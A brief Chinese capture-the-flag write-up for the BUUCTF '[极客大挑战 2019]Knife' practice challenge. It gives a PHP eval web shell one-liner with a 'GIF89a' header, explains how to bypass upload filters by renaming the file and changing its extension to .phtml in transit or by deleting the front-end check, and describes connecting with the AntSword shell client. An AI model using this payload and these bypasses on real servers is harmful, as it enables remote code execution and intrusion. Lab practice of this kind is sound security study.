[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)

[极客大挑战 2019]Knife------3.20BUUCTF练习day4(2)

解题内容

在一个文件中输入以下内容，该文件是phtml文件（HTML嵌套PHP代码，可以绕过很多限制）但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等

GIF89a
<script language='php'>@eval($_POST[shell]);</script>

蚁剑连接

看了别人的wp,发现还可以删除前端校验函数，直接传phtml文件也可以

拓展

在上传的文件代码中含有GIF89a，这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验

PHP getimagesize（服务器端验证）

读取文件头信息，不是解析整个图片，所以效率较高